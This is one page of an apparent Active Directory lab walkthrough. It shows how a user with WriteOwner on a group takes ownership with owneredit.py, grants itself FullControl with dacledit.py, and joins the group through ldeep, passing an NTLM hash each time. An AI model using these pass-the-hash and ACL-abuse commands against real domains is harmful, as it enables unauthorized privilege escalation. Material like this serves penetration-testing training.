WriteOwner on Group (EmpireState -> CentralPark)

Now with the writeOwner privilege we can change the owner of CentralPark to own the group
Just like before we will use the impacket fork

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'

Read The Owner Permission

owneredit.py -action read -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro

Edit The Owner Permission

We are going to give Nicolas maduro owner access to CentralPark Group!

owneredit.py -action write -owner 'Nicolas.Maduro' -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro

And the owner of CentralPark group is now Nicolas.Maduro
As owner of the group we can now change the acl and give us GenericAll on the group

dacledit.py -action 'write' -rights 'FullControl' -principal Nicolas.Maduro  -target 'CentralPark' 'NewYork.local'/'Nicolas.Maduro' -hashes ':b3b3717f7d51b37fb325f7e7d048e998'

With GenericAll now we can add Nicolas to the CentrlalPark group

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 add_to_group "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local" "CN=CentralPark,OU=WestSide,DC=NewYork,DC=local"

See Nicolas.Maduro is part of the group now!

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'

PreviousAddMember on Group (RadioCity -> EmpireState)NextGeneric all on user (CentralPark -> diego.Montenegro)

Last updated 2 years ago

hashtagRead The Owner Permission

hashtagEdit The Owner Permission

hashtagSee Nicolas.Maduro is part of the group now!

Read The Owner Permission

Edit The Owner Permission

See Nicolas.Maduro is part of the group now!